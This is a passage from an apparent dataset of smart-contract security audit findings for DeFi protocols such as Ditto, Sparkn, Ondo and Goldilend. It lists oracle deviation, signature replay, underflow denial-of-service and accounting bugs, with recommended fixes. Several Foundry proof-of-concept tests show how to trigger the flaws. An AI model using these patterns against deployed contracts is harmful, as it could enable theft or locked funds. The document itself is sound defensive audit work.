hardcoded value of 50% price deviation (0.5 ether), which might be too large when using the ETH as a base price reference. 
Moreover, the fixed % deviation is considered too risky because the protocol's DAO or admin will not be able to update it in production.\\n```\\n //@audit -- this report raises an issue regarding the priceDeviation variable only, as the invalidFetchData (2-hour stale check) was flagged as a known issue\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp;\\n uint256 chainlinkDiff = chainlinkPriceInEth > protocolPrice\\n ? chainlinkPriceInEth - protocolPrice\\n : protocolPrice - chainlinkPriceInEth;\\n bool priceDeviation =\\n protocolPrice > 0 && chainlinkDiff.div(protocolPrice) > 0.5 ether;\\n\\n //@dev if there is issue with chainlink, get twap price. Compare twap and chainlink\\n if (invalidFetchData || priceDeviation) { //@audit -- this report raises an issue regarding the priceDeviation variable only, as the invalidFetchData (2-hour stale check) was flagged as a known issue\\n // rest of code\\n } else {\\n return chainlinkPriceInEth;\\n }\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L77-L78\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L81чThe % price deviation should be a variable updatable by the protocol's DAO or admin in production.чThis report raises an issue regarding the `priceDeviation` variable only, as the `invalidFetchData` (2-hour stale check) was flagged as a known issue.\\nThe use of the hardcoded value of 50% price deviation (0.5 ether) might be too large when using the ETH as a base price reference. 
Moreover, the fixed % deviation is considered too risky because the protocol's DAO or admin will not be able to update it in production.\\nConsequently, the check for price deviation in the `baseOracleCircuitBreaker()` might not be effective enough for filtering out the stale price in production, directly affecting the quality of the oracle price that will be consumed by the core functions of the `Ditto` protocol (HIGH impact).ч```\\n //@audit -- this report raises an issue regarding the priceDeviation variable only, as the invalidFetchData (2-hour stale check) was flagged as a known issue\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp;\\n uint256 chainlinkDiff = chainlinkPriceInEth > protocolPrice\\n ? chainlinkPriceInEth - protocolPrice\\n : protocolPrice - chainlinkPriceInEth;\\n bool priceDeviation =\\n protocolPrice > 0 && chainlinkDiff.div(protocolPrice) > 0.5 ether;\\n\\n //@dev if there is issue with chainlink, get twap price. Compare twap and chainlink\\n if (invalidFetchData || priceDeviation) { //@audit -- this report raises an issue regarding the priceDeviation variable only, as the invalidFetchData (2-hour stale check) was flagged as a known issue\\n // rest of code\\n } else {\\n return chainlinkPriceInEth;\\n }\\n }\\n```\\n -Emitting incorrect event valueчlowчThe `LibShortRecord::burnNFT()` emits an incorrect event value.\\nThe `burnNFT()` emits an incorrect event value: `nft.owner`. Specifically, the `nft` variable will point to the storage object specified by the `tokenId`. 
However, the pointing storage object will be deleted before emitting the `Transfer` event.\\nSubsequently, the `ERC721::Transfer` event will be emitted with `nft.owner` == `address(0)`.\\n```\\n function burnNFT(uint256 tokenId) internal {\\n //@dev No need to check downcast tokenId because it is handled in function that calls burnNFT\\n AppStorage storage s = appStorage();\\n STypes.NFT storage nft = s.nftMapping[tokenId];\\n if (nft.owner == address(0)) revert Errors.NotMinted();\\n address asset = s.assetMapping[nft.assetId];\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][nft.owner][nft.shortRecordId];\\n delete s.nftMapping[tokenId];\\n delete s.getApproved[tokenId];\\n delete short.tokenId;\\n emit Events.Transfer(nft.owner, address(0), tokenId);\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibShortRecord.sol#L366\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibShortRecord.sol#L371\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibShortRecord.sol#L374чEmit the `Transfer` event before the `delete` operations.\\n```\\n function burnNFT(uint256 tokenId) internal {\\n //@dev No need to check downcast tokenId because it is handled in function that calls burnNFT\\n AppStorage storage s = appStorage();\\n STypes.NFT storage nft = s.nftMapping[tokenId];\\n if (nft.owner == address(0)) revert Errors.NotMinted();\\n address asset = s.assetMapping[nft.assetId];\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][nft.owner][nft.shortRecordId];\\n// Add the line below\\n emit Events.Transfer(nft.owner, address(0), tokenId);\\n delete s.nftMapping[tokenId];\\n delete s.getApproved[tokenId];\\n delete short.tokenId;\\n// Remove the line below\\n emit Events.Transfer(nft.owner, address(0), tokenId);\\n }\\n```\\nчThe `ERC721::Transfer` is an important 
event. The incorrect event logs may cause off-chain services to malfunction.ч```\\n function burnNFT(uint256 tokenId) internal {\\n //@dev No need to check downcast tokenId because it is handled in function that calls burnNFT\\n AppStorage storage s = appStorage();\\n STypes.NFT storage nft = s.nftMapping[tokenId];\\n if (nft.owner == address(0)) revert Errors.NotMinted();\\n address asset = s.assetMapping[nft.assetId];\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][nft.owner][nft.shortRecordId];\\n delete s.nftMapping[tokenId];\\n delete s.getApproved[tokenId];\\n delete short.tokenId;\\n emit Events.Transfer(nft.owner, address(0), tokenId);\\n }\\n```\\n -The same signature can be used in different `distribution` implementation causing that the caller who owns the signature, can distribute on unauthorized implementationsчhighчThe same signature can be used in different `distribute` implementations causing that the caller who owns the signature, to `distribute` on unauthorized implementations.\\nThe ProxyFactory::setContest() function helps to configure a `closeTime` to specific `organizer`, `contestId` and `implementation`.\\n```\\nFile: ProxyFactory.sol\\n function setContest(address organizer, bytes32 contestId, uint256 closeTime, address implementation)\\n public\\n onlyOwner\\n// rest of code\\n// rest of code\\n bytes32 salt = _calculateSalt(organizer, contestId, implementation);\\n if (saltToCloseTime[salt] != 0) revert ProxyFactory__ContestIsAlreadyRegistered();\\n saltToCloseTime[salt] = closeTime;\\n```\\n\\nThe caller who owns the signature, can distributes to winners using the deployProxyAndDistributeBySignature() function. 
The problem is that the hash in the code line (#159) does not consider the `implementation` parameter.\\n```\\nFile: ProxyFactory.sol\\n function deployProxyAndDistributeBySignature(\\n address organizer,\\n bytes32 contestId,\\n address implementation,\\n bytes calldata signature,\\n bytes calldata data\\n ) public returns (address) {\\n bytes32 digest = _hashTypedDataV4(keccak256(abi.encode(contestId, data)));\\n if (ECDSA.recover(digest, signature) != organizer) revert ProxyFactory__InvalidSignature();\\n bytes32 salt = _calculateSalt(organizer, contestId, implementation);\\n if (saltToCloseTime[salt] == 0) revert ProxyFactory__ContestIsNotRegistered();\\n if (saltToCloseTime[salt] > block.timestamp) revert ProxyFactory__ContestIsNotClosed();\\n address proxy = _deployProxy(organizer, contestId, implementation);\\n _distribute(proxy, data);\\n return proxy;\\n }\\n```\\n\\nFor some reason, there could be a different `distribution` implementation to the same `contestId`. Then the caller who owns the signature can distribute even if the organizer does not authorize a signature to the new implementation.\\nI created a test where the caller who owns a signature can distribute to new `distribute implementation` using the same signature. Test steps:\\nOwner setContest using the implementation `address(distributor)`\\nOrganizer creates a signature.\\nCaller distributes prizes using the signature.\\nFor some reason there is a new distributor implementation. The Owner set the new distributor for the same `contestId`.\\nThe caller can distribute prizes using the same signature created in the step 2 in different distributor implementation.\\n```\\n// test/integration/ProxyFactoryTest.t.sol:ProxyFactoryTest\\n// $ forge test --match-test \"testSignatureCanBeUsedToNewImplementation\" -vvv\\n//\\n function testSignatureCanBeUsedToNewImplementation() public {\\n address organizer = TEST_SIGNER;\\n bytes32 contestId = keccak256(abi.encode(\"Jason\", \"001\"));\\n //\\n // 1. 
Owner setContest using address(distributor)\\n vm.startPrank(factoryAdmin);\\n proxyFactory.setContest(organizer, contestId, block.timestamp + 8 days, address(distributor));\\n vm.stopPrank();\\n bytes32 salt = keccak256(abi.encode(organizer, contestId, address(distributor)));\\n address proxyAddress = proxyFactory.getProxyAddress(salt, address(distributor));\\n vm.startPrank(sponsor);\\n MockERC20(jpycv2Address).transfer(proxyAddress, 10000 ether);\\n vm.stopPrank();\\n assertEq(MockERC20(jpycv2Address).balanceOf(proxyAddress), 10000 ether);\\n // before\\n assertEq(MockERC20(jpycv2Address).balanceOf(user1), 0 ether);\\n assertEq(MockERC20(jpycv2Address).balanceOf(stadiumAddress), 0 ether);\\n //\\n // 2. Organizer creates a signature\\n (bytes32 digest, bytes memory sendingData, bytes memory signature) = createSignatureByASigner(TEST_SIGNER_KEY);\\n assertEq(ECDSA.recover(digest, signature), TEST_SIGNER);\\n vm.warp(8.01 days);\\n //\\n // 3. Caller distributes prizes using the signature\\n proxyFactory.deployProxyAndDistributeBySignature(\\n TEST_SIGNER, contestId, address(distributor), signature, sendingData\\n );\\n // after\\n assertEq(MockERC20(jpycv2Address).balanceOf(user1), 9500 ether);\\n assertEq(MockERC20(jpycv2Address).balanceOf(stadiumAddress), 500 ether);\\n //\\n // 4. 
For some reason there is a new distributor implementation.\\n // The Owner set the new distributor for the same contestId\\n Distributor new_distributor = new Distributor(address(proxyFactory), stadiumAddress);\\n vm.startPrank(factoryAdmin);\\n proxyFactory.setContest(organizer, contestId, block.timestamp + 8 days, address(new_distributor));\\n vm.stopPrank();\\n bytes32 newDistributorSalt = keccak256(abi.encode(organizer, contestId, address(new_distributor)));\\n address proxyNewDistributorAddress = proxyFactory.getProxyAddress(newDistributorSalt, address(new_distributor));\\n vm.startPrank(sponsor);\\n MockERC20(jpycv2Address).transfer(proxyNewDistributorAddress, 10000 ether);\\n vm.stopPrank();\\n //\\n // 5. The caller can distribute prizes using the same signature in different distributor implementation\\n vm.warp(20 days);\\n proxyFactory.deployProxyAndDistributeBySignature(\\n TEST_SIGNER, contestId, address(new_distributor), signature, sendingData\\n );\\n }\\n```\\nчInclude the `distribution implementation` in the signature hash.\\n```\\n function deployProxyAndDistributeBySignature(\\n address organizer,\\n bytes32 contestId,\\n address implementation,\\n bytes calldata signature,\\n bytes calldata data\\n ) public returns (address) {\\n// Remove the line below\\n// Remove the line below\\n bytes32 digest = _hashTypedDataV4(keccak256(abi.encode(contestId, data)));\\n// Add the line below\\n// Add the line below\\n bytes32 digest = _hashTypedDataV4(keccak256(abi.encode(contestId, implementation, data)));\\n```\\nчThe caller who owns the signature, can distribute the prizes for a new distribution implementation using the same signature which was created for an old implementation. The `organizer` must create a new signature if there is a new implementation for the same `contestId`. 
The authorized signature is for one distribution implementation not for the future distribution implementations.\\nTools used\\nManual reviewч```\\nFile: ProxyFactory.sol\\n function setContest(address organizer, bytes32 contestId, uint256 closeTime, address implementation)\\n public\\n onlyOwner\\n// rest of code\\n// rest of code\\n bytes32 salt = _calculateSalt(organizer, contestId, implementation);\\n if (saltToCloseTime[salt] != 0) revert ProxyFactory__ContestIsAlreadyRegistered();\\n saltToCloseTime[salt] = closeTime;\\n```\\n -Blacklisted STADIUM_ADDRESS address cause fund stuck in the contract foreverчmediumчThe vulnerability relates to the immutability of `STADIUM_ADDRESS`. If this address is blacklisted by the token used for rewards, the system becomes unable to make transfers, leading to funds being stuck in the contract indefinitely.\\nOwner calls `setContest` with the correct `salt`.\\nThe Organizer sends USDC as rewards to a pre-determined Proxy address.\\n`STADIUM_ADDRESS` is blacklisted by the USDC operator.\\nWhen the contest is closed, the Organizer calls `deployProxyAndDistribute` with the registered `contestId` and `implementation` to deploy a proxy and distribute rewards. 
However, the call to `Distributor._commissionTransfer` reverts at Line 164 due to the blacklisting.\\nUSDC held at the Proxy contract becomes stuck forever.\\n```\\n// Findings are labeled with '<= FOUND'\\n// File: src/Distributor.sol\\n function _distribute(address token, address[] memory winners, uint256[] memory percentages, bytes memory data)\\n // rest of code\\n _commissionTransfer(erc20);// <= FOUND\\n // rest of code\\n }\\n // rest of code\\n function _commissionTransfer(IERC20 token) internal {\\n token.safeTransfer(STADIUM_ADDRESS, token.balanceOf(address(this)));// <= FOUND: Blacklisted STADIUM_ADDRESS address cause fund stuck in the contract forever\\n }\\n```\\nчIt is recommended to allow `STADIUM_ADDRESS` to be updatable by a dedicated admin role to avoid token transfer blacklisting. Moreover, since `STADIUM_ADDRESS` is no longer `immutable`, `storage` collision should be taken into account.чThis vulnerability is marked as High severity because a blacklisted `STADIUM_ADDRESS` would lead to funds being locked in the Proxy address permanently. Funds are already held in the Proxy, and the Proxy's `_implementation` cannot be changed once deployed. 
Even the `ProxyFactory.distributeByOwner()` function cannot rescue the funds due to the revert.ч```\\n// Findings are labeled with '<= FOUND'\\n// File: src/Distributor.sol\\n function _distribute(address token, address[] memory winners, uint256[] memory percentages, bytes memory data)\\n // rest of code\\n _commissionTransfer(erc20);// <= FOUND\\n // rest of code\\n }\\n // rest of code\\n function _commissionTransfer(IERC20 token) internal {\\n token.safeTransfer(STADIUM_ADDRESS, token.balanceOf(address(this)));// <= FOUND: Blacklisted STADIUM_ADDRESS address cause fund stuck in the contract forever\\n }\\n```\\n -`InvestorBasedRateLimiter::setInvestorMintLimit` and `setInvestorRedemptionLimit` can make subsequent calls to `checkAndUpdateMintLimit` and `checkAndUpdateRedemptionLimit` revert due to underflowчlowч`InvestorBasedRateLimiter::_checkAndUpdateRateLimitState` L211-213 subtracts the current mint/redemption amount from the corresponding limit:\\n```\\nif (amount > rateLimit.limit - rateLimit.currentAmount) {\\n revert RateLimitExceeded();\\n}\\n```\\n\\nIf `setInvestorMintLimit` or `setInvestorRedemptionLimit` are used to set the limit amount for minting or redemptions smaller than the current mint/redemption amount, calls to this function will revert due to underflow.чExplicitly handle the case where the limit is smaller than the current mint/redemption amount:\\n```\\nif (rateLimit.limit <= rateLimit.currentAmount || amount > rateLimit.limit - rateLimit.currentAmount) {\\n revert RateLimitExceeded();\\n}\\n```\\nч`InvestorBasedRateLimiter::setInvestorMintLimit` and `setInvestorRedemptionLimit` can make subsequent calls to `checkAndUpdateMintLimit` and `checkAndUpdateRedemptionLimit` revert due to underflow.\\nProof of Concept: Add this drop-in PoC to forge-tests/ousg/InvestorBasedRateLimiter/setters.t.sol:\\n```\\nfunction test_setInvestorMintLimit_underflow_DoS() public initDefault(alice) {\\n // first perform a mint\\n uint256 mintAmount = 
rateLimiter.defaultMintLimit();\\n vm.prank(client);\\n rateLimiter.checkAndUpdateMintLimit(alice, mintAmount);\\n\\n // admin now reduces the mint limit to be under the current\\n // minted amount\\n uint256 aliceInvestorId = 1;\\n uint256 newMintLimit = mintAmount - 1;\\n vm.prank(guardian);\\n rateLimiter.setInvestorMintLimit(aliceInvestorId, newMintLimit);\\n\\n // subsequent calls to `checkAndUpdateMintLimit` revert due to underflow\\n vm.prank(client);\\n rateLimiter.checkAndUpdateMintLimit(alice, 1);\\n\\n // same issue affects `setInvestorRedemptionLimit`\\n}\\n```\\n\\nRun with: `forge test --match-test test_setInvestorMintLimit_underflow_DoS`\\nProduces output:\\n```\\nRan 1 test for forge-tests/ousg/InvestorBasedRateLimiter/setters.t.sol:Test_InvestorBasedRateLimiter_setters_ETH\\n[FAIL. Reason: panic: arithmetic underflow or overflow (0x11)] test_setInvestorMintLimit_underflow_DoS() (gas: 264384)\\nSuite result: FAILED. 0 passed; 1 failed; 0 skipped; finished in 1.09ms (116.74µs CPU time)\\n```\\nч```\\nif (amount > rateLimit.limit - rateLimit.currentAmount) {\\n revert RateLimitExceeded();\\n}\\n```\\n -Prevent creating an investor record associated with no addressчlowч`InvestorBasedRateLimiter::initializeInvestorStateDefault` is supposed to associate a newly created investor with one or more addresses but the `for` loop which does this can be bypassed by calling the function with an empty array:\\n```\\nfunction initializeInvestorStateDefault(\\n address[] memory addresses\\n ) external onlyRole(CONFIGURER_ROLE) {\\n _initializeInvestorState(\\n addresses,\\n defaultMintLimit,\\n defaultRedemptionLimit,\\n defaultMintLimitDuration,\\n defaultRedemptionLimitDuration\\n );\\n}\\n\\nfunction _initializeInvestorState(\\n address[] memory addresses,\\n uint256 mintLimit,\\n uint256 redemptionLimit,\\n uint256 mintLimitDuration,\\n uint256 redemptionLimitDuration\\n ) internal {\\n uint256 investorId = ++investorIdCounter;\\n\\n // @audit this `for` loop 
can be bypassed by calling\\n // `initializeInvestorStateDefault` with an empty array\\n for (uint256 i = 0; i < addresses.length; ++i) {\\n // Safety check to ensure the address is not already associated with an investor\\n // before associating it with a new investor\\n if (addressToInvestorId[addresses[i]] != 0) {\\n revert AddressAlreadyAssociated();\\n }\\n _setAddressToInvestorId(addresses[i], investorId);\\n }\\n\\n investorIdToMintState[investorId] = RateLimit({\\n currentAmount: 0,\\n limit: mintLimit,\\n lastResetTime: block.timestamp,\\n limitDuration: mintLimitDuration\\n });\\n investorIdToRedemptionState[investorId] = RateLimit({\\n currentAmount: 0,\\n limit: redemptionLimit,\\n lastResetTime: block.timestamp,\\n limitDuration: redemptionLimitDuration\\n });\\n}\\n```\\nчIn `_initializeInvestorState` revert if the input address array is empty:\\n```\\nuint256 addressesLength = addresses.length;\\n\\nif(addressesLength == 0) revert EmptyAddressArray();\\n```\\nчAn investor record can be created without any associated address. 
This breaks the following invariant of the `InvestorBasedRateLimiter` contract:\\nwhen a new `investorId` is created, it should be associated with one or more valid addresses\\nProof of Concept: Add this drop-in PoC to forge-tests/ousg/InvestorBasedRateLimiter/setters.t.sol:\\n```\\nfunction test_initializeInvestor_NoAddress() public {\\n // no investor created\\n assertEq(0, rateLimiter.investorIdCounter());\\n\\n // empty input array will bypass the `for` loop that is supposed\\n // to associate addresses to the newly created investor\\n address[] memory addresses;\\n\\n vm.prank(guardian);\\n rateLimiter.initializeInvestorStateDefault(addresses);\\n\\n // one investor created\\n assertEq(1, rateLimiter.investorIdCounter());\\n\\n // not associated with any addresses\\n assertEq(0, rateLimiter.investorAddressCount(1));\\n}\\n```\\n\\nRun with: `forge test --match-test test_initializeInvestor_NoAddress`ч```\\nfunction initializeInvestorStateDefault(\\n address[] memory addresses\\n ) external onlyRole(CONFIGURER_ROLE) {\\n _initializeInvestorState(\\n addresses,\\n defaultMintLimit,\\n defaultRedemptionLimit,\\n defaultMintLimitDuration,\\n defaultRedemptionLimitDuration\\n );\\n}\\n\\nfunction _initializeInvestorState(\\n address[] memory addresses,\\n uint256 mintLimit,\\n uint256 redemptionLimit,\\n uint256 mintLimitDuration,\\n uint256 redemptionLimitDuration\\n ) internal {\\n uint256 investorId = ++investorIdCounter;\\n\\n // @audit this `for` loop can be bypassed by calling\\n // `initializeInvestorStateDefault` with an empty array\\n for (uint256 i = 0; i < addresses.length; ++i) {\\n // Safety check to ensure the address is not already associated with an investor\\n // before associating it with a new investor\\n if (addressToInvestorId[addresses[i]] != 0) {\\n revert AddressAlreadyAssociated();\\n }\\n _setAddressToInvestorId(addresses[i], investorId);\\n }\\n\\n investorIdToMintState[investorId] = RateLimit({\\n currentAmount: 0,\\n limit: mintLimit,\\n 
lastResetTime: block.timestamp,\\n limitDuration: mintLimitDuration\\n });\\n investorIdToRedemptionState[investorId] = RateLimit({\\n currentAmount: 0,\\n limit: redemptionLimit,\\n lastResetTime: block.timestamp,\\n limitDuration: redemptionLimitDuration\\n });\\n}\\n```\\n -`InstantMintTimeBasedRateLimiter::_setInstantMintLimit` and `_setInstantRedemptionLimit` can make subsequent calls to `_checkAndUpdateInstantMintLimit` and `_checkAndUpdateInstantRedemptionLimit` revert due to underflowчlowч`InstantMintTimeBasedRateLimiter::_checkAndUpdateInstantMintLimit` L103-106 subtracts the currently minted amount from the mint limit:\\n```\\nrequire(\\n amount <= instantMintLimit - currentInstantMintAmount,\\n \"RateLimit: Mint exceeds rate limit\"\\n);\\n```\\n\\nIf `_setInstantMintLimit` is used to set `instantMintLimit < currentInstantMintAmount`, subsequent calls to this function will revert due the underflow. The same is true for `_setInstantRedemptionLimit` and `_checkAndUpdateInstantRedemptionLimit`.чExplicitly handle the case where the limit is smaller than the current mint/redemption amount:\\n```\\nfunction _checkAndUpdateInstantMintLimit(uint256 amount) internal {\\n require(\\n instantMintLimit > currentInstantMintAmount && amount <= instantMintLimit - currentInstantMintAmount,\\n \"RateLimit: Mint exceeds rate limit\"\\n );\\n}\\n\\nfunction _checkAndUpdateInstantRedemptionLimit(uint256 amount) internal {\\n require(\\n instantRedemptionLimit > currentInstantRedemptionAmount && amount <= instantRedemptionLimit - currentInstantRedemptionAmount,\\n \"RateLimit: Redemption exceeds rate limit\"\\n );\\n}\\n```\\nч`InstantMintTimeBasedRateLimiter::_setInstantMintLimit` and `_setInstantRedemptionLimit` can make subsequent calls to `_checkAndUpdateInstantMintLimit` and `_checkAndUpdateInstantRedemptionLimit` revert due to underflow.ч```\\nrequire(\\n amount <= instantMintLimit - currentInstantMintAmount,\\n \"RateLimit: Mint exceeds rate limit\"\\n);\\n```\\n 
-Protocol may be short-changed by `BuidlRedeemer` during a USDC depeg eventчlowч`OUSGInstantManager::_redeemBUIDL` assumes that 1 BUIDL = 1 USDC as it enforces receiving 1 USDC for every 1 BUIDL it redeems:\\n```\\nuint256 usdcBalanceBefore = usdc.balanceOf(address(this));\\nbuidl.approve(address(buidlRedeemer), buidlAmountToRedeem);\\nbuidlRedeemer.redeem(buidlAmountToRedeem);\\nrequire(\\n usdc.balanceOf(address(this)) == usdcBalanceBefore + buidlAmountToRedeem,\\n \"OUSGInstantManager::_redeemBUIDL: BUIDL:USDC not 1:1\"\\n);\\n```\\n\\nIn the event of a USDC depeg (especially if the depeg is sustained), `BUIDLRedeemer` should return greater than a 1:1 ratio since 1 USDC would not be worth $1, hence 1 BUIDL != 1 USDC meaning the value of the protocol's BUIDL is worth more USDC. However `BUIDLReceiver` does not do this, it only ever returns 1:1.чTo prevent this situation the protocol would need to use an oracle to check whether USDC had depegged and if so, calculate the amount of USDC it should receive in exchange for its BUIDL. 
If it is short-changed it would either have to revert preventing redemptions or allow the redemption while saving the short-changed amount to storage then implement an off-chain process with BlackRock to receive the short-changed amount.\\nAlternatively the protocol may simply accept this as a risk to the protocol that it will be willingly short-changed during a USDC depeg in order to allow redemptions to continue.чIn the event of a USDC depeg the protocol will be short-changed by `BuidlRedeemer` since it will happily receive only 1 USDC for every 1 BUIDL redeemed, even though the value of 1 BUIDL would be greater than the value of 1 USDC due to the USDC depeg.ч```\\nuint256 usdcBalanceBefore = usdc.balanceOf(address(this));\\nbuidl.approve(address(buidlRedeemer), buidlAmountToRedeem);\\nbuidlRedeemer.redeem(buidlAmountToRedeem);\\nrequire(\\n usdc.balanceOf(address(this)) == usdcBalanceBefore + buidlAmountToRedeem,\\n \"OUSGInstantManager::_redeemBUIDL: BUIDL:USDC not 1:1\"\\n);\\n```\\n -Consider allowing `ROUSG::burn` to burn dust amountsчlowч`ROUSG::burn` is used by admins to burn `rOUSG` tokens from any account for regulatory reasons.\\nIt does not allow burning a share amount smaller than 1e4, because this is less than a wei of `OUSG`.\\n```\\nif (ousgSharesAmount < OUSG_TO_ROUSG_SHARES_MULTIPLIER)\\n revert UnwrapTooSmall();\\n```\\n\\nDepending on the current and future regulatory situation it could be necessary to always be able to burn all shares from users.чConsider allowing the `burn` function to `burn` all remaining shares even if under the minimum amount.чч```\\nif (ousgSharesAmount < OUSG_TO_ROUSG_SHARES_MULTIPLIER)\\n revert UnwrapTooSmall();\\n```\\n -`Goldilend.lock()` will always revertчhighчIn `lock()`, it calls `_refreshiBGT()` before pulling `iBGT` from the user and will revert while calling `iBGTVault(ibgtVault).stake()`.\\n```\\n function lock(uint256 amount) external {\\n uint256 mintAmount = _GiBGTMintAmount(amount);\\n poolSize += 
amount;\\n _refreshiBGT(amount); //@audit should call after depositing funds\\n SafeTransferLib.safeTransferFrom(ibgt, msg.sender, address(this), amount);\\n _mint(msg.sender, mintAmount);\\n emit iBGTLock(msg.sender, amount);\\n }\\n// rest of code\\n function _refreshiBGT(uint256 ibgtAmount) internal {\\n ERC20(ibgt).approve(ibgtVault, ibgtAmount);\\n iBGTVault(ibgtVault).stake(ibgtAmount); //@audit will revert here\\n }\\n```\\nч`_refreshiBGT()` should be called after pulling funds from the user.чUsers can't lock `iBGT` as `lock()` always reverts.ч```\\n function lock(uint256 amount) external {\\n uint256 mintAmount = _GiBGTMintAmount(amount);\\n poolSize += amount;\\n _refreshiBGT(amount); //@audit should call after depositing funds\\n SafeTransferLib.safeTransferFrom(ibgt, msg.sender, address(this), amount);\\n _mint(msg.sender, mintAmount);\\n emit iBGTLock(msg.sender, amount);\\n }\\n// rest of code\\n function _refreshiBGT(uint256 ibgtAmount) internal {\\n ERC20(ibgt).approve(ibgtVault, ibgtAmount);\\n iBGTVault(ibgtVault).stake(ibgtAmount); //@audit will revert here\\n }\\n```\\n -Wrong `PoolSize` increment in `Goldilend.repay()`чhighчWhen a user repays his loan using `repay()`, it increases `poolSize` with the repaid interest. During the increment, it uses the wrong amount.\\n```\\n function repay(uint256 repayAmount, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(userLoan.borrowedAmount < repayAmount) revert ExcessiveRepay();\\n if(block.timestamp > userLoan.endDate) revert LoanExpired();\\n uint256 interestLoanRatio = FixedPointMathLib.divWad(userLoan.interest, userLoan.borrowedAmount);\\n uint256 interest = FixedPointMathLib.mulWadUp(repayAmount, interestLoanRatio);\\n outstandingDebt -= repayAmount - interest > outstandingDebt ? 
outstandingDebt : repayAmount - interest;\\n loans[msg.sender][_userLoanId].borrowedAmount -= repayAmount;\\n loans[msg.sender][_userLoanId].interest -= interest;\\n poolSize += userLoan.interest * (1000 - (multisigShare + apdaoShare)) / 1000; //@audit should use interest instead of userLoan.interest\\n// rest of code\\n }\\n```\\n\\nIt should use `interest` instead of `userLoan.interest` because the user repaid `interest` only.ч`poolSize` should be updated using `interest`.ч`poolSize` would be tracked wrongly after calling `repay()` and several functions wouldn't work as expected.ч```\\n function repay(uint256 repayAmount, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(userLoan.borrowedAmount < repayAmount) revert ExcessiveRepay();\\n if(block.timestamp > userLoan.endDate) revert LoanExpired();\\n uint256 interestLoanRatio = FixedPointMathLib.divWad(userLoan.interest, userLoan.borrowedAmount);\\n uint256 interest = FixedPointMathLib.mulWadUp(repayAmount, interestLoanRatio);\\n outstandingDebt -= repayAmount - interest > outstandingDebt ? 
outstandingDebt : repayAmount - interest;\\n loans[msg.sender][_userLoanId].borrowedAmount -= repayAmount;\\n loans[msg.sender][_userLoanId].interest -= interest;\\n poolSize += userLoan.interest * (1000 - (multisigShare + apdaoShare)) / 1000; //@audit should use interest instead of userLoan.interest\\n// rest of code\\n }\\n```\\n -Users can extend an expired boost using invalidated NFTs.чhighчIn `Goldilend.sol#L251`, a user can extend a boost with invalidated NFTs.\\nThe user has created a boost with a valid NFT.\\nAfter that, the NFT was invalidated using `adjustBoosts()`.\\nAfter the original boost is expired, the user can just call `boost()` with empty arrays, and the boost will be extended again with the original magnitude.\\n```\\n function _buildBoost(\\n address[] calldata partnerNFTs,\\n uint256[] calldata partnerNFTIds\\n ) internal returns (Boost memory newUserBoost) {\\n uint256 magnitude;\\n Boost storage userBoost = boosts[msg.sender];\\n if(userBoost.expiry == 0) {\\n// rest of code\\n }\\n else {\\n address[] storage nfts = userBoost.partnerNFTs;\\n uint256[] storage ids = userBoost.partnerNFTIds;\\n magnitude = userBoost.boostMagnitude; //@audit use old magnitude without checking\\n for (uint256 i = 0; i < partnerNFTs.length; i++) {\\n magnitude += partnerNFTBoosts[partnerNFTs[i]];\\n nfts.push(partnerNFTs[i]);\\n ids.push(partnerNFTIds[i]);\\n }\\n newUserBoost = Boost({\\n partnerNFTs: nfts,\\n partnerNFTIds: ids,\\n expiry: block.timestamp + boostLockDuration,\\n boostMagnitude: magnitude\\n });\\n }\\n }\\n```\\nчWhenever users extend their boosts, their NFTs should be evaluated again.чMalicious users can use invalidated NFTs to extend their boosts forever.ч```\\n function _buildBoost(\\n address[] calldata partnerNFTs,\\n uint256[] calldata partnerNFTIds\\n ) internal returns (Boost memory newUserBoost) {\\n uint256 magnitude;\\n Boost storage userBoost = boosts[msg.sender];\\n if(userBoost.expiry == 0) {\\n// rest of code\\n }\\n else {\\n 
address[] storage nfts = userBoost.partnerNFTs;\\n uint256[] storage ids = userBoost.partnerNFTIds;\\n magnitude = userBoost.boostMagnitude; //@audit use old magnitude without checking\\n for (uint256 i = 0; i < partnerNFTs.length; i++) {\\n magnitude += partnerNFTBoosts[partnerNFTs[i]];\\n nfts.push(partnerNFTs[i]);\\n ids.push(partnerNFTIds[i]);\\n }\\n newUserBoost = Boost({\\n partnerNFTs: nfts,\\n partnerNFTIds: ids,\\n expiry: block.timestamp + boostLockDuration,\\n boostMagnitude: magnitude\\n });\\n }\\n }\\n```\\n -Team members can't unstake the initial allocation forever.чhighчWhen users call `unstake()`, it calculates the vested amount using `_vestingCheck()`.\\n```\\n function _vestingCheck(address user, uint256 amount) internal view returns (uint256) {\\n if(teamAllocations[user] > 0) return 0; //@audit return 0 for team members\\n uint256 initialAllocation = seedAllocations[user];\\n if(initialAllocation > 0) {\\n if(block.timestamp < vestingStart) return 0;\\n uint256 vestPortion = FixedPointMathLib.divWad(block.timestamp - vestingStart, vestingEnd - vestingStart);\\n return FixedPointMathLib.mulWad(vestPortion, initialAllocation) - 